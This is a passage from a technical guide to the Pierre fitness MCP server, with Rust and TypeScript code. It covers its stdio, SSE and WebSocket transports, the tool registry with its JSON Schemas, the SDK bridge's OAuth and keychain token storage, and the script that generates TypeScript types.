Ok(_) => {}
Err(e) => warn!("Failed to handle sampling response: {}", e),
}
}
}
Transport startup:
Source: src/mcp/transport_manager.rs:70-85, 148
#![allow(unused)]
fn main() {
fn spawn_stdio_transport(
resources: Arc<ServerResources>,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) {
let stdio_handle = tokio::spawn(async move {
let stdio_transport = StdioTransport::new(resources);
match stdio_transport.run(notification_receiver).await {
Ok(()) => info!("stdio transport completed successfully"),
Err(e) => warn!("stdio transport failed: {}", e),
}
});
// Monitor task completion
tokio::spawn(async move {
match stdio_handle.await {
Ok(()) => info!("stdio transport task completed"),
Err(e) => warn!("stdio transport task failed: {}", e),
}
});
}
// Called from start_legacy_unified_server()
Self::spawn_stdio_transport(shared_resources.clone(), notification_receiver);
}
Use cases:
- Claude Desktop integration via MCP stdio protocol
- Direct MCP client connections
- Server-initiated LLM requests (MCP Sampling)
- OAuth notifications to stdio clients
Sse Transport (Notifications)
Server-Sent Events provide server-to-client notifications:
Source: src/mcp/transport_manager.rs:90-101
#![allow(unused)]
fn main() {
/// Spawn SSE notification forwarder task
fn spawn_sse_forwarder(
resources: Arc<ServerResources>,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) {
tokio::spawn(async move {
let sse_forwarder = SseNotificationForwarder::new(resources);
if let Err(e) = sse_forwarder.run(notification_receiver).await {
error!("SSE notification forwarder failed: {}", e);
}
});
}
}
SSE characteristics:
- Unidirectional: Server → Client only
- Long-lived: Connection stays open
- Text-based: Sends
data:prefixed messages - Auto-reconnect: Browsers reconnect on disconnect
MCP notifications over SSE:
- OAuth flow completion
- Tool execution progress
- Resource updates
- Prompt changes
Example SSE event:
data: {"jsonrpc":"2.0","method":"notifications/oauth_completed","params":{"provider":"strava","status":"success"}}
Websocket Transport (Bidirectional)
WebSocket provides full-duplex bidirectional communication for real-time updates:
Source: src/websocket.rs:88-127
#![allow(unused)]
fn main() {
/// Manages WebSocket connections and message broadcasting
#[derive(Clone)]
pub struct WebSocketManager {
database: Arc<Database>,
auth_middleware: McpAuthMiddleware,
clients: Arc<RwLock<HashMap<Uuid, ClientConnection>>>,
broadcast_tx: broadcast::Sender<WebSocketMessage>,
}
impl WebSocketManager {
/// Creates a new WebSocket manager instance
#[must_use]
pub fn new(
database: Arc<Database>,
auth_manager: &Arc<AuthManager>,
jwks_manager: &Arc<JwksManager>,
rate_limit_config: RateLimitConfig,
) -> Self {
let (broadcast_tx, _) = broadcast::channel(WEBSOCKET_CHANNEL_CAPACITY);
let auth_middleware = McpAuthMiddleware::new(
(**auth_manager).clone(),
database.clone(),
jwks_manager.clone(),
rate_limit_config,
);
Self {
database,
auth_middleware,
clients: Arc::new(RwLock::new(HashMap::new())),
broadcast_tx,
}
}
}
WebSocket message types:
Source: src/websocket.rs:35-86
#![allow(unused)]
fn main() {
/// WebSocket message types for real-time communication
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum WebSocketMessage {
/// Client authentication message
#[serde(rename = "auth")]
Authentication {
token: String,
},
/// Subscribe to specific topics
#[serde(rename = "subscribe")]
Subscribe {
topics: Vec<String>,
},
/// API key usage update notification
#[serde(rename = "usage_update")]
UsageUpdate {
api_key_id: String,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
},
/// System-wide statistics update
#[serde(rename = "system_stats")]
SystemStats {
total_requests_today: u64,
total_requests_this_month: u64,
active_connections: usize,
},
/// Error message to client
#[serde(rename = "error")]
Error {
message: String,
},
/// Success confirmation message
#[serde(rename = "success")]
Success {
message: String,
},
}
}
Connection handling:
Source: src/websocket.rs:206-269
#![allow(unused)]
fn main() {
/// Handle incoming WebSocket connection
pub async fn handle_connection(&self, ws: WebSocket) {
let (mut ws_tx, mut ws_rx) = ws.split();
let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();
let connection_id = Uuid::new_v4();
let mut authenticated_user: Option<Uuid> = None;
let mut subscriptions: Vec<String> = Vec::new();
// Spawn task to forward messages to WebSocket
let ws_send_task = tokio::spawn(async move {
while let Some(message) = rx.recv().await {
if ws_tx.send(message).await.is_err() {
break;
}
}
});
// Handle incoming messages
while let Some(msg) = ws_rx.next().await {
match msg {
Ok(Message::Text(text)) => match serde_json::from_str::<WebSocketMessage>(&text) {
Ok(WebSocketMessage::Authentication { token }) => {
authenticated_user = self.handle_auth_message(&token, &tx).await;
}
Ok(WebSocketMessage::Subscribe { topics }) => {
subscriptions = Self::handle_subscribe_message(topics, authenticated_user, &tx);
}
// ... error handling
_ => {}
},
Ok(Message::Close(_)) | Err(_) => break,
_ => {}
}
}
// Store authenticated connection
if let Some(user_id) = authenticated_user {
let client = ClientConnection {
user_id,
subscriptions,
tx: tx.clone(),
};
self.clients.write().await.insert(connection_id, client);
}
// Clean up on disconnect
ws_send_task.abort();
self.clients.write().await.remove(&connection_id);
}
}
WebSocket authentication flow:
- Client connects to
/wsendpoint - Client sends
{"type":"auth","token":"Bearer ..."}message - Server validates JWT using
McpAuthMiddleware - Server responds with
{"type":"success"}or{"type":"error"} - Authenticated client can subscribe to topics
Topic subscription:
{
"type": "subscribe",
"topics": ["usage", "system"]
}
Broadcasting updates:
Source: src/websocket.rs:285-303
#![allow(unused)]
fn main() {
/// Broadcast usage update to subscribed clients
pub async fn broadcast_usage_update(
&self,
api_key_id: &str,
user_id: &Uuid,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
) {
let message = WebSocketMessage::UsageUpdate {
api_key_id: api_key_id.to_owned(),
requests_today,
requests_this_month,
rate_limit_status,
};
self.send_to_user_subscribers(user_id, &message, "usage")
.await;
}
}
Periodic system stats:
Source: src/websocket.rs:394-409
#![allow(unused)]
fn main() {
/// Start background task for periodic updates
pub fn start_periodic_updates(&self) {
let manager = self.clone(); // Safe: Arc clone for background task
tokio::spawn(async move {
let mut interval = interval(Duration::from_secs(30)); // Update every 30 seconds
loop {
interval.tick().await;
// Broadcast system stats
if let Err(e) = manager.broadcast_system_stats().await {
warn!("Failed to broadcast system stats: {}", e);
}
}
});
}
}
WebSocket characteristics:
- Bidirectional: Full-duplex client ↔ server communication
- JWT authentication: Required before subscribing
- Topic-based subscriptions: Clients choose what to receive
- Broadcast channels:
tokio::sync::broadcastfor efficient distribution - Connection tracking:
HashMap<Uuid, ClientConnection>withRwLock - Automatic cleanup: Connections removed on disconnect
- Periodic updates: System stats every 30 seconds
Use cases:
- Real-time API usage monitoring
- Rate limit status updates
- System health dashboards
- Live fitness data streaming
- OAuth flow status updates
Rust Idiom: WebSocket connection splitting
The ws.split() pattern separates the WebSocket into independent read and write halves. This allows concurrent sending/receiving without conflicts. The mpsc::unbounded_channel bridges the write half to the message handler, decoupling message generation from socket I/O.
Transport Coordination
The TransportManager starts all transports concurrently:
Source: src/mcp/transport_manager.rs:41-53, 130-152
#![allow(unused)]
fn main() {
/// Start all transport methods (HTTP, SSE, WebSocket) in coordinated fashion
///
/// # Errors
/// Returns an error if transport setup or server startup fails
pub async fn start_all_transports(&self, port: u16) -> AppResult<()> {
info!(
"Transport manager coordinating all transports on port {}",
port
);
// Delegate to the unified server implementation
self.start_legacy_unified_server(port).await
}
/// Unified server startup using existing transport coordination
async fn start_legacy_unified_server(&self, port: u16) -> AppResult<()> {
info!("Starting MCP server with HTTP transports (Axum framework)");
let sse_notification_receiver = self.notification_sender.subscribe();
let mut resources_clone = (*self.resources).clone();
resources_clone.set_oauth_notification_sender(self.notification_sender.clone());
Self::spawn_progress_handler(&mut resources_clone);
let shared_resources = Arc::new(resources_clone);
Self::spawn_sse_forwarder(shared_resources.clone(), sse_notification_receiver);
Self::run_http_server_loop(shared_resources, port).await
}
}
Concurrency: Transports run in separate tokio::spawn tasks, allowing simultaneous HTTP, SSE, and WebSocket clients.
Notification Broadcasting
The broadcast::channel distributes notifications to subscribed transports:
#![allow(unused)]
fn main() {
let (notification_sender, _) = broadcast::channel(100);
// Subscribe for SSE transport
let sse_notification_receiver = self.notification_sender.subscribe();
// Send notification (from OAuth callback)
notification_sender.send(OAuthCompletedNotification {
provider: "strava",
status: "success",
user_id
})?;
}
Rust Idiom: broadcast::channel for pub-sub
The broadcast::channel allows multiple subscribers. When a notification is sent, all active subscribers receive it. This is perfect for distributing OAuth completion events to SSE and WebSocket transports simultaneously.
Key Takeaways
-
Transport abstraction: MCP protocol is transport-agnostic. Same JSON-RPC messages work over stdio, HTTP, SSE, and WebSocket.
-
Stdio transport: Native Rust implementation using
BufReaderfor stdin, supports MCP Sampling for server-initiated LLM requests, runs concurrently with HTTP/SSE. -
HTTP transport: REST endpoints with Axum framework for web clients, with CORS and rate limiting support.
-
SSE for notifications: Server-Sent Events provide unidirectional server→client notifications for OAuth completion and progress updates. SSE routes are implemented in
src/sse/routes.rs. -
WebSocket transport: Full-duplex bidirectional communication with JWT authentication, topic-based subscriptions, and real-time updates. Supports usage monitoring, system stats broadcasting every 30 seconds, and live data streaming.
-
WebSocket message types: Tagged enum with Authentication, Subscribe, UsageUpdate, SystemStats, Error, and Success variants for type-safe messaging.
-
Connection management:
WebSocketManagertracks authenticated clients inHashMap<Uuid, ClientConnection>withRwLockfor concurrent access. -
Broadcast notifications:
tokio::sync::broadcastdistributes notifications to all active transports simultaneously. -
Concurrent transports: All transports run in separate
tokio::spawntasks, allowing simultaneous stdio, HTTP, SSE, and WebSocket clients. -
Shared resources:
Arc<ServerResources>provides thread-safe access to database, auth manager, and other services across transports. -
Error isolation: Each transport handles errors independently. HTTP failure doesn’t affect stdio, SSE, or WebSocket transports.
-
Auto-recovery: HTTP transport restarts on failure with exponential backoff (5s, 10s).
-
Transport-agnostic processing:
McpRequestProcessorhandles requests identically regardless of transport source. -
WebSocket splitting:
ws.split()pattern separates read/write halves for concurrent bidirectional communication without conflicts. -
MCP Sampling: Stdio transport supports server-initiated LLM requests via
SamplingPeer, enabling Pierre to request completions from connected MCP clients.
Next Chapter: Chapter 12: MCP Tool Registry & Type-Safe Routing - Learn how the Pierre platform registers MCP tools, validates parameters with JSON Schema, and routes tool calls to handlers.
Chapter 12: MCP Tool Registry & Type-Safe Routing
Tool Registry Overview
Pierre registers all MCP tools at startup using a centralized registry:
Source: src/mcp/schema.rs
#![allow(unused)]
fn main() {
pub fn get_tools() -> Vec<ToolSchema> {
create_fitness_tools()
}
/// Create all fitness provider tool schemas (47 tools in 8 categories)
fn create_fitness_tools() -> Vec<ToolSchema> {
vec![
// Connection tools (3)
create_connect_provider_tool(),
create_get_connection_status_tool(),
create_disconnect_provider_tool(),
// Core fitness tools (4)
create_get_activities_tool(),
create_get_athlete_tool(),
create_get_stats_tool(),
create_get_activity_intelligence_tool(),
// Analytics tools (14)
create_analyze_activity_tool(),
create_calculate_metrics_tool(),
// ... more analytics tools
// Configuration tools (10)
create_get_configuration_catalog_tool(),
// ... more configuration tools
// Nutrition tools (5)
create_calculate_daily_nutrition_tool(),
// ... more nutrition tools
// Sleep & Recovery tools (5)
create_analyze_sleep_quality_tool(),
// ... more sleep tools
// Recipe Management tools (7)
create_get_recipe_constraints_tool(),
// ... more recipe tools
]
}
}
Registry pattern: Single get_tools() function returns all available tools. This ensures tools/list and tools/call use the same definitions.
See tools-reference.md for the complete list of 47 tools.
Tool Schema Structure
Each tool has a name, description, and JSON Schema for parameters:
Source: src/mcp/schema.rs:57-67
#![allow(unused)]
fn main() {
/// MCP Tool Schema Definition
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ToolSchema {
/// Tool name identifier
pub name: String,
/// Human-readable tool description
pub description: String,
/// JSON Schema for tool input parameters
#[serde(rename = "inputSchema")]
pub input_schema: JsonSchema,
}
}
Fields:
name: Unique identifier (e.g., “get_activities”)description: Human-readable explanation for AI assistantsinputSchema: JSON Schema defining required/optional parameters
JSON Schema for Validation
JSON Schema describes parameter structure:
Source: src/mcp/schema.rs:69-81
#![allow(unused)]
fn main() {
/// JSON Schema Definition
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonSchema {
/// Schema type (e.g., "object", "string")
#[serde(rename = "type")]
pub schema_type: String,
/// Property definitions for object schemas
#[serde(skip_serializing_if = "Option::is_none")]
pub properties: Option<HashMap<String, PropertySchema>>,
/// List of required property names
#[serde(skip_serializing_if = "Option::is_none")]
pub required: Option<Vec<String>>,
}
}
Example tool schema (conceptual):
{
"name": "get_activities",
"description": "Fetch fitness activities from connected providers",
"inputSchema": {
"type": "object",
"properties": {
"provider": {
"type": "string",
"description": "Provider name (strava, garmin, etc.)"
},
"limit": {
"type": "number",
"description": "Maximum activities to return"
}
},
"required": ["provider"]
}
}
Parameter Validation
MCP servers validate tool parameters against inputSchema before execution. Invalid parameters return error code -32602 (Invalid params).
Validation rules:
- Required parameters must be present
- Parameter types must match schema
- Unknown parameters may be ignored or rejected
- Nested objects validated recursively
Tool Handler Routing
Tool calls route to handler functions based on tool name. The full flow from Chapter 10 through 12:
tools/call request
│
▼
Extract tool name and arguments
│
▼
Look up tool in registry (Chapter 12)
│
▼
Validate arguments against inputSchema (Chapter 12)
│
▼
Route to handler function (Chapter 10)
│
▼
Execute with authentication (Chapter 6)
│
▼
Return ToolResponse
Key Takeaways
-
Centralized registry:
get_tools()returns all available tools for both tools/list and tools/call. -
JSON Schema validation: inputSchema defines required/optional parameters with types.
-
Type safety: Rust types ensure schema correctness at compile time.
-
Dynamic registration: Adding new tools requires updating
create_fitness_tools()array. -
Parameter extraction: Tools parse
argumentsJSON using serde deserialization. -
Error codes: Invalid parameters return -32602 per JSON-RPC spec.
-
Tool discovery: AI assistants call tools/list to learn available functionality.
-
Schema-driven UX: Good descriptions and schema help AI assistants use tools correctly.
End of Part III: MCP Protocol
You’ve completed the MCP protocol implementation section. You now understand:
- JSON-RPC 2.0 foundation (Chapter 9)
- MCP request flow and processing (Chapter 10)
- Transport layers (stdio, HTTP, SSE) (Chapter 11)
- Tool registry and JSON Schema validation (Chapter 12)
Next Chapter: Chapter 13: SDK Bridge Architecture - Begin Part IV by learning how the TypeScript SDK communicates with the Rust MCP server via stdio transport.
Chapter 13: SDK Bridge Architecture
This chapter explores how the TypeScript SDK bridges MCP hosts (like Claude Desktop) to the Pierre server, translating between stdio (MCP standard) and HTTP (Pierre’s transport).
SDK Bridge Pattern
The SDK acts as a transparent bridge between MCP hosts and Pierre server:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Claude │ stdio │ SDK │ HTTP │ Pierre │
│ Desktop │◄───────►│ Bridge │◄───────►│ Server │
│ (MCP Host) │ │ (TypeScript)│ │ (Rust) │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ tools/list │ GET /mcp/tools │
├────────────────────────►├────────────────────────►│
│ │ │
│ tools (JSON-RPC) │ HTTP 200 │
│◄────────────────────────┼◄────────────────────────┤
Source: sdk/src/bridge.ts:70-84
export interface BridgeConfig {
pierreServerUrl: string;
jwtToken?: string;
apiKey?: string;
oauthClientId?: string;
oauthClientSecret?: string;
userEmail?: string;
userPassword?: string;
callbackPort?: number;
disableBrowser?: boolean;
tokenValidationTimeoutMs?: number;
proactiveConnectionTimeoutMs?: number;
proactiveToolsListTimeoutMs?: number;
toolCallConnectionTimeoutMs?: number;
}
Configuration:
pierreServerUrl: Pierre HTTP endpoint (e.g.,http://localhost:8081)jwtToken/apiKey: Pre-existing authenticationoauthClientId/oauthClientSecret: OAuth app credentialsuserEmail/userPassword: Login credentialscallbackPort: OAuth callback listener port
OAuth Client Provider
The SDK implements OAuth 2.0 client for Pierre authentication:
Source: sdk/src/bridge.ts:113-150
class PierreOAuthClientProvider implements OAuthClientProvider {
private serverUrl: string;
private config: BridgeConfig;
private clientInfo: OAuthClientInformationFull | undefined = undefined;
private savedTokens: OAuthTokens | undefined = undefined;
private codeVerifierValue: string | undefined = undefined;
private stateValue: string | undefined = undefined;
private callbackServer: any = undefined;
private authorizationPending: Promise<any> | undefined = undefined;
private callbackPort: number = 0;
private callbackSessionToken: string | undefined = undefined;
// Secure token storage using OS keychain
private secureStorage: SecureTokenStorage | undefined = undefined;
private allStoredTokens: StoredTokens = {};
// Client-side client info storage (client info is not sensitive, can stay in file)
private clientInfoPath: string;
constructor(serverUrl: string, config: BridgeConfig) {
this.serverUrl = serverUrl;
this.config = config;
// Initialize client info storage path
const os = require('os');
const path = require('path');
this.clientInfoPath = path.join(os.homedir(), '.pierre-mcp-client-info.json');
// NOTE: Secure storage initialization is async, so it's deferred to start()
// to avoid race conditions with constructor completion
// See initializePierreConnection() for the actual initialization
// Load client info from storage (synchronous, non-sensitive)
this.loadClientInfo();
this.log(`OAuth client provider created for server: ${serverUrl}`);
this.log(`Using OS keychain for secure token storage (will initialize on start)`);
this.log(`Client info storage path: ${this.clientInfoPath}`);
}
OAuth flow:
- Discovery: Fetch
/.well-known/oauth-authorization-serverfor endpoints - Registration: Register OAuth client with Pierre (RFC 7591)
- Authorization: Open browser to
/oauth/authorize - Callback: Listen for OAuth callback on localhost
- Token exchange: POST to
/oauth/tokenwith authorization code - Token storage: Save to OS keychain (macOS Keychain, Windows Credential Manager, Linux Secret Service)
Secure Token Storage
The SDK stores OAuth tokens in OS-native secure storage:
Source: sdk/src/bridge.ts:59-68
interface StoredTokens {
pierre?: OAuthTokens & { saved_at?: number };
providers?: Record<string, {
access_token: string;
refresh_token?: string;
expires_at?: number;
token_type?: string;
scope?: string;
}>;
}
Storage locations:
- macOS: Keychain (
securitycommand-line tool) - Windows: Credential Manager (Windows Credential Store API)
- Linux: Secret Service API (libsecret)
Security: Tokens never stored in plaintext files. OS-native encryption protects credentials.
MCP Host Integration
The SDK integrates with MCP hosts via stdio transport:
Source: sdk/src/bridge.ts:13-16
import { Client } from '@modelcontextprotocol/sdk/client/index.js';
import { Server } from '@modelcontextprotocol/sdk/server/index.js';
import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';
Components:
Server: MCP server exposed to host via stdioStdioServerTransport: stdio transport for MCP host communicationClient: MCP client connecting to PierreStreamableHTTPClientTransport: HTTP transport for Pierre connection
Message Routing
The SDK routes messages bidirectionally:
Claude Desktop → Server (stdio) → Client (HTTP) → Pierre
Claude Desktop ← Server (stdio) ← Client (HTTP) ← Pierre
Request flow:
- MCP host sends JSON-RPC to SDK’s stdio (e.g.,
tools/call) - SDK’s Server receives via
StdioServerTransport - SDK’s Client forwards to Pierre via
StreamableHTTPClientTransport - Pierre processes and returns JSON-RPC response
- SDK’s Client receives HTTP response
- SDK’s Server sends JSON-RPC to MCP host via stdio
Automatic OAuth Handling
The SDK handles OAuth flows transparently:
Source: sdk/src/bridge.ts:48-57
// Define custom notification schema for Pierre's OAuth completion notifications
const OAuthCompletedNotificationSchema = z.object({
method: z.literal('notifications/oauth_completed'),
params: z.object({
provider: z.string(),
success: z.boolean(),
message: z.string(),
user_id: z.string().optional()
}).optional()
});
OAuth notifications:
- Pierre sends
notifications/oauth_completedvia SSE - SDK receives notification and updates stored tokens
- Future requests use refreshed tokens automatically
Key Takeaways
-
Bridge pattern: SDK translates stdio (MCP standard) <-> HTTP (Pierre transport).
-
OAuth client: Full OAuth 2.0 implementation with discovery, registration, and token exchange.
-
Secure storage: OS-native keychain for token storage (never plaintext files).
-
Transparent integration: MCP hosts (Claude Desktop) connect via stdio without knowing about HTTP backend.
-
Bidirectional routing: Messages flow both directions through SDK bridge.
-
Automatic token refresh: SDK handles token expiration and refresh transparently.
-
MCP SDK: Built on official
@modelcontextprotocol/sdkfor standard compliance.
Next Chapter: Chapter 14: Type Generation & Tools-to-Types - Learn how Pierre generates TypeScript types from Rust tool definitions for type-safe SDK development.
Chapter 14: Type Generation & Tools-to-Types System
This chapter explores Pierre’s automated type generation system that converts Rust tool schemas to TypeScript interfaces, ensuring type safety between the server and SDK. You’ll learn about schema-driven development, synthetic data generation for testing, and the complete tools-to-types workflow.
Type Generation Overview
Pierre generates TypeScript types directly from server tool schemas:
┌──────────────┐ tools/list ┌──────────────┐ generate ┌──────────────┐
│ Rust Tool │──────────────►│ JSON Schema │───────────►│ TypeScript │
│ Definitions │ (runtime) │ (runtime) │ (script) │ Interfaces │
└──────────────┘ └──────────────┘ └──────────────┘
src/mcp/ inputSchema sdk/src/types.ts
schema.rs properties
Single Source of Truth: Rust definitions generate both runtime API and TypeScript types
Key insight: Tool schemas defined in Rust become the single source of truth for both runtime validation and TypeScript type safety.
Tools-to-Types Script
The type generator fetches schemas from a running Pierre server and converts them to TypeScript:
Source: scripts/generate-sdk-types.js:1-16
#!/usr/bin/env node
// ABOUTME: Auto-generates TypeScript type definitions from Pierre server tool schemas
// ABOUTME: Fetches MCP tool schemas and converts them to TypeScript interfaces for SDK usage
const http = require('http');
const fs = require('fs');
const path = require('path');
/**
* Configuration
*/
const SERVER_URL = process.env.PIERRE_SERVER_URL || 'http://localhost:8081';
const SERVER_PORT = process.env.HTTP_PORT || '8081';
const OUTPUT_FILE = path.join(__dirname, '../sdk/src/types.ts');
const JWT_TOKEN = process.env.PIERRE_JWT_TOKEN || null;
Configuration:
SERVER_URL: Pierre server endpoint (default: localhost:8081)OUTPUT_FILE: Generated TypeScript output (sdk/src/types.ts)JWT_TOKEN: Optional authentication for protected servers
Fetching Tool Schemas
The script calls tools/list to retrieve all tool schemas:
Source: scripts/generate-sdk-types.js:20-74
/**
* Fetch tool schemas from Pierre server
*/
async function fetchToolSchemas() {
return new Promise((resolve, reject) => {
const requestData = JSON.stringify({
jsonrpc: '2.0',
id: 1,
method: 'tools/list',
params: {}
});
const options = {
hostname: 'localhost',
port: SERVER_PORT,
path: '/mcp',
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Content-Length': Buffer.byteLength(requestData),
...(JWT_TOKEN ? { 'Authorization': `Bearer ${JWT_TOKEN}` } : {})
}
};
const req = http.request(options, (res) => {
let data = '';
res.on('data', (chunk) => {
data += chunk;
});
res.on('end', () => {
if (res.statusCode !== 200) {
reject(new Error(`Server returned ${res.statusCode}: ${data}`));
return;
}
try {
const parsed = JSON.parse(data);
if (parsed.error) {
reject(new Error(`MCP error: ${JSON.stringify(parsed.error)}`));
return;
}
resolve(parsed.result.tools || []);
} catch (err) {
reject(new Error(`Failed to parse response: ${err.message}`));
}
});
});
req.on('error', (err) => {
reject(new Error(`Failed to connect to server: ${err.message}`));
});
req.write(requestData);
req.end();
});
}
Fetch flow:
- JSON-RPC request: POST to
/mcpwithtools/listmethod - Authentication: Include JWT token if available
- Parse response: Extract
result.toolsarray - Error handling: Validate status code and JSON-RPC errors
JSON Schema to Typescript Conversion
The core conversion logic maps JSON Schema types to TypeScript:
Source: scripts/generate-sdk-types.js:79-127
/**
* Convert JSON schema property to TypeScript type
*/
function jsonSchemaToTypeScript(property, propertyName, required = false) {
if (!property) {
return 'any';
}
const isOptional = !required;
const optionalMarker = isOptional ? '?' : '';
// Handle type arrays (e.g., ["string", "null"])
if (Array.isArray(property.type)) {
const types = property.type
.filter(t => t !== 'null')
.map(t => jsonSchemaToTypeScript({ type: t }, propertyName, true));
const typeStr = types.length > 1 ? types.join(' | ') : types[0];
return property.type.includes('null') ? `${typeStr} | null` : typeStr;
}
switch (property.type) {
case 'string':
if (property.enum) {
return property.enum.map(e => `"${e}"`).join(' | ');
}
return 'string';
case 'number':
case 'integer':
return 'number';
case 'boolean':
return 'boolean';
case 'array':
if (property.items) {
const itemType = jsonSchemaToTypeScript(property.items, propertyName, true);
return `${itemType}[]`;
}
return 'any[]';
case 'object':
if (property.properties) {
return generateInterfaceFromProperties(property.properties, property.required || []);
}
if (property.additionalProperties) {
const valueType = jsonSchemaToTypeScript(property.additionalProperties, propertyName, true);
return `Record<string, ${valueType}>`;
}
return 'Record<string, any>';
case 'null':
return 'null';
default:
return 'any';
}
}
Type mapping:
string->string(with enum support for union types)number/integer->numberboolean->booleanarray->T[](with item type inference)object-> inline interface orRecord<string, T>- Union types:
["string", "null"]->string | null
Typescript Idioms: Union Types and Literal Types
Union types for enums:
Source: scripts/generate-sdk-types.js:98-100
case 'string':
if (property.enum) {
return property.enum.map(e => `"${e}"`).join(' | ');
}
Example generated type:
provider: "strava" | "fitbit" | "garmin" // from enum in JSON Schema
This is idiomatic TypeScript - using literal union types instead of enum provides better type narrowing and inline values.
Interface Generation
The script generates named interfaces for each tool’s parameters:
Source: scripts/generate-sdk-types.js:185-205
const paramTypes = tools.map(tool => {
const interfaceName = `${toPascalCase(tool.name)}Params`;
const description = tool.description ? `\n/**\n * ${tool.description}\n */` : '';
if (!tool.inputSchema || !tool.inputSchema.properties || Object.keys(tool.inputSchema.properties).length === 0) {
return `${description}\nexport interface ${interfaceName} {}\n`;
}
const properties = tool.inputSchema.properties;
const required = tool.inputSchema.required || [];
const fields = Object.entries(properties).map(([name, prop]) => {
const isRequired = required.includes(name);
const tsType = jsonSchemaToTypeScript(prop, name, isRequired);
const optional = isRequired ? '' : '?';
const propDescription = prop.description ? `\n /** ${prop.description} */` : '';
return `${propDescription}\n ${name}${optional}: ${tsType};`;
});
return `${description}\nexport interface ${interfaceName} {\n${fields.join('\n')}\n}\n`;
}).join('\n');
Generated output example (sdk/src/types.ts:69-81):
/**
* Get fitness activities from a provider
*/
export interface GetActivitiesParams {
/** Maximum number of activities to return */
limit?: number;
/** Number of activities to skip (for pagination) */
offset?: number;
/** Fitness provider name (e.g., 'strava', 'fitbit') */
provider: string;
}
Naming convention: tool_name -> ToolNameParams (PascalCase conversion)
Type-Safe Tool Mapping
The script generates a union type of all tool names and parameter mapping:
Source: scripts/generate-sdk-types.js:237-253
const toolNamesUnion = `
// ============================================================================
// TOOL NAME TYPES
// ============================================================================
/**
* Union type of all available tool names
*/
export type ToolName = ${tools.map(t => `"${t.name}"`).join(' | ')};
/**
* Map of tool names to their parameter types
*/
export interface ToolParamsMap {
${tools.map(t => ` "${t.name}": ${toPascalCase(t.name)}Params;`).join('\n')}
}
`;
Generated output (sdk/src/types.ts - conceptual):
export type ToolName = "get_activities" | "get_athlete" | "get_stats" | /* 42 more... */;
export interface ToolParamsMap {
"get_activities": GetActivitiesParams;
"get_athlete": GetAthleteParams;
"get_stats": GetStatsParams;
// ... 42 more tools
}
Type safety benefit: TypeScript can validate tool names and infer correct parameter types at compile time.
Common Data Types
The generator includes manually-defined domain types for fitness data:
Source: scripts/generate-sdk-types.js:265-309
/**
* Fitness activity data structure
*/
export interface Activity {
id: string;
name: string;
type: string;
distance?: number;
duration?: number;
moving_time?: number;
elapsed_time?: number;
total_elevation_gain?: number;
start_date?: string;
start_date_local?: string;
timezone?: string;
average_speed?: number;
max_speed?: number;
average_cadence?: number;
average_heartrate?: number;
max_heartrate?: number;
average_watts?: number;
kilojoules?: number;
device_watts?: boolean;
has_heartrate?: boolean;
calories?: number;
description?: string;
trainer?: boolean;
commute?: boolean;
manual?: boolean;
private?: boolean;
visibility?: string;
flagged?: boolean;
gear_id?: string;
from_accepted_tag?: boolean;
upload_id?: number;
external_id?: string;
achievement_count?: number;
kudos_count?: number;
comment_count?: number;
athlete_count?: number;
photo_count?: number;
map?: {
id?: string;
summary_polyline?: string;
polyline?: string;
};
[key: string]: any;
}
Design choice: While tool parameter types are auto-generated, domain types like Activity, Athlete, and Stats are manually maintained for stability and documentation.
Running Type Generation
Invoke the generator via npm script:
Source: sdk/package.json:14
"scripts": {
"generate-types": "node ../scripts/generate-sdk-types.js"
}
Workflow:
# 1. Start Pierre server (required - provides tool schemas)
cargo run --bin pierre-mcp-server
# 2. Generate types from running server
cd sdk
npm run generate-types
# 3. Generated output: sdk/src/types.ts (45+ tool interfaces)
Output example:
Pierre SDK Type Generator
==============================
Fetching tool schemas from http://localhost:8081/mcp...
Fetched 47 tool schemas
Generating TypeScript definitions...
Writing to sdk/src/types.ts...
Successfully generated types for 47 tools!
Generated interfaces:
- ConnectToPierreParams
- ConnectProviderParams
- GetActivitiesParams
... (42 more)
Type generation complete!
Import types in your code:
import { GetActivitiesParams, Activity } from './types';
Synthetic Data Generation
Pierre includes a synthetic data generator for testing without OAuth connections:
Source: tests/helpers/synthetic_data.rs:11-35
#![allow(unused)]
fn main() {
/// Builder for creating synthetic fitness activity data
///
/// Provides deterministic, reproducible generation of realistic fitness activities
/// for testing intelligence algorithms without requiring real OAuth connections.
///
/// # Examples
///
/// ```
/// use tests::synthetic_data::SyntheticDataBuilder;
/// use chrono::Utc;
///
/// let builder = SyntheticDataBuilder::new(42); // Deterministic seed
/// let activity = builder.generate_run()
/// .duration_minutes(30)
/// .distance_km(5.0)
/// .start_date(Utc::now())
/// .build();
/// ```
#[derive(Debug, Clone)]
pub struct SyntheticDataBuilder {
// Reserved for future algorithmic tests requiring seed reproducibility verification
#[allow(dead_code)]
seed: u64,
rng: ChaCha8Rng,
}
}
Key features:
- Deterministic: Seeded RNG (
ChaCha8Rng) ensures reproducible test data - Builder pattern: Fluent API for constructing activities
- Realistic data: Generates physiologically plausible metrics
Rust Idioms: Builder Pattern for Test Data
Source: tests/helpers/synthetic_data.rs:47-67
#![allow(unused)]
fn main() {
impl SyntheticDataBuilder {
/// Create new builder with deterministic seed for reproducibility
#[must_use]
pub fn new(seed: u64) -> Self {
Self {
seed,
rng: ChaCha8Rng::seed_from_u64(seed),
}
}
/// Generate a synthetic running activity
#[must_use]
#[allow(clippy::missing_const_for_fn)] // Cannot be const: uses &mut self.rng
pub fn generate_run(&mut self) -> ActivityBuilder<'_> {
ActivityBuilder::new(SportType::Run, &mut self.rng)
}
/// Generate a synthetic cycling activity
#[must_use]
#[allow(clippy::missing_const_for_fn)] // Cannot be const: uses &mut self.rng
pub fn generate_ride(&mut self) -> ActivityBuilder<'_> {
ActivityBuilder::new(SportType::Ride, &mut self.rng)
}
}
}
